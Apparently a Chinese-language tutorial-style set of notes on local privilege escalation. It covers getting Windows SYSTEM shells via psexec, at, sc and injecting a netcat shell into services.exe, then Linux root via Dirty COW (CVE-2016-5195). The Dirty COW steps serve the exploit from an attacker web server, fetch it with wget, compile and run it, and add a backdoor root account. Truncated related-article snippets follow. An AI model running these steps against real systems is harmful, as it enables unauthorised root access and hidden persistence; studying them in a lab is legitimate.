髒牛提權
髒牛提權步驟
vmware共享檔案
本地提權
系統賬號
在cmd的命令互動介面輸入p***ec
輸入命令p***ec -i -s cmd
即可開啟 乙個具有系統許可權的互動介面
輸入命令at 17:23/interactive cmd
即可在規定的時間開啟 乙個具有系統許可權的互動介面[外鏈轉存失敗,源站可能有防盜煉機制,建議將儲存下來直接上傳(img-zelg085e-1576240645371)(picture/image-20191208173421495.png)]
sc start syscmd # 執行叫做syscmd的服務,服務名稱可自定
需要將pinjector.exe放入路徑c:\windows\system32
中,然後在命令互動介面輸入pinjector
使用injector -l
可以檢視系統中的服務、服務程序號、服務許可權
比如以services.exe為目標,其pid:968,注入到services中
則命令為injector -p 968 cmd 4444
使用netcat連線到目標機
優點:非常隱蔽
缺點:當對方重新啟動服務後,就造成注入失效,需要重新注入
關於windows的一些整合工具在kali的此目錄下/usr/share/windows-binaries
其中的whoami是乙個適用於32系統的程式
髒牛(dirty cow)是linux核心的乙個提權漏洞,攻擊者可以利用這個漏洞獲取root許可權。之所以叫dirty cow,因為這個漏洞利用了linux的copy-on-write機制。髒牛的cve編號是cve-2016-5195。
危害:低許可權使用者利用該漏洞可以在眾多linux系統上實現本地提權
簡要分析:該漏洞具體為,get_user_page核心函式在處理copy-on-write(以下使用cow表示)的過程中,可能產出競態條件造成cow過程被破壞,導致出現寫資料到程序位址空間內唯讀記憶體區域的機會。修改su或者passwd程式就可以達到root的目的。
以下是主流發行版修復之後的核心版本,如果核心版本低於列表裡的版本,表示還存在髒牛漏洞
在測試機上使用centos7 /rhel7 3.10.0-327.36.3.el7
cetnos6/rhel6 2.6.32-642.6.2.el6
ubuntu 16.10 4.8.0-26.28
ubuntu 16.04 4.4.0-45.66
ubuntu 14.04 3.13.0-100.147
debian 8 3.16.36-1+deb8u2
debian 7 3.2.82-1
python -m ******httpserver 80
開始web服務,將dirty.c的檔案放在目錄下,因為不同主機的編譯結果不同,最好是在目標機上進行編譯
wget 192.168.72.141/dirty.c ~/desktop/
在目標機上,使用gcc對dirty.c的檔案進行編譯,得到dirty,並執行
dirty程式修改了/etc/passwd檔案,生成了乙個新的root賬戶,username:firefart;password:nbnb,切換後就擁有了管理員許可權gcc -pthread dirty.c -o dirty -lcrypt
dirty
還原passwd中的使用者資訊
在/tmp中多了個passwd.bak的檔案,記錄髒牛前的使用者資訊
使用命令還原passwd檔案,以前的root使用者恢復
mv /tmp/passwd.bak /etc/passwd
在vmware的虛擬機器設定中,選項中開啟,並新增物理機上需要與虛擬機器共享共享的資料夾
linux:/mnt/hgfs/
windows:\\vmware-host\shared folders
髒牛**:
內網提權 系統篇
windows 系統漏洞 ms系列 ms08 067 rpcms09 012 pr.exe 巴西烤肉提權 ms09 020 iis5 6 ms12 202 rdp藍屏 ms17 010 永恆之藍 wannacry cve 2019 0708 rdp 命令執行 粘滯鍵提權 sethc.exe 使用cm...
MySQL提權簡單方法
孤水繞城 s blog 前不久網上公開了乙個mysql func的漏洞,講的是使用mysql建立乙個自定義的函式,然後通過這個函式來攻擊伺服器。最早看到相關的報道是在o otik上,但是公布的是針對unix系統的exploit,並且成功率也不是很高.而近期,國內有高手放出針對win系統的相關文章,於...
Linux系統之提權操作
1 su 切換至xx使用者,輸入xx使用者的密碼。用法 su xx使用者 注 1 su命令後不跟xx使用者或只跟 預設為root。2 登入沒有時間限制。3 如果只是對一條命令執行root許可權的,加 c 即可。4 多使用者使用系統時,最好採用sudo提權,可以避免root密碼洩露。選項 1 m,p ...